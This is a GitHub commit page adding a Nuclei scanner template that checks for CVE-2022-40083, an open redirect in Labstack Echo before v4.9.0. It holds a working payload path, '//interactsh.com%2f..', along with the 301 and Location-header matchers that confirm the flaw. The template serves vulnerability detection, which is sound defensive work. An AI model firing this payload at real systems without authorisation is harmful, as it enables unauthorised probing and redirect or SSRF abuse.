Merge pull request #5606 from projectdiscovery/CVE-2022-40083

Added CVE-2022-40083
patch-1
Prince Chaddha 2022-10-11 15:54:25 +05:30 committed by GitHub
commit edde235eb3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: CVE-2022-40083
info:
name: Labstack Echo < v4.9.0 - Open Redirect
author: pdteam
severity: medium
description: |
Labstack Echo v4.8.0 was discovered to contain an open redirect vulnerability via the Static Handler component. This vulnerability can be leveraged by attackers to cause a Server-Side Request Forgery (SSRF).
reference:
- https://github.com/labstack/echo/issues/2259
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-40083
cwe-id: CWE-601
tags: cve,cve2022,redirect,labstack
requests:
- method: GET
path:
- "{{BaseURL}}//interactsh.com%2f.."
matchers-condition: and
matchers:
- type: word
part: location
words:
- '//interactsh.com/../'
- type: status
status:
- 301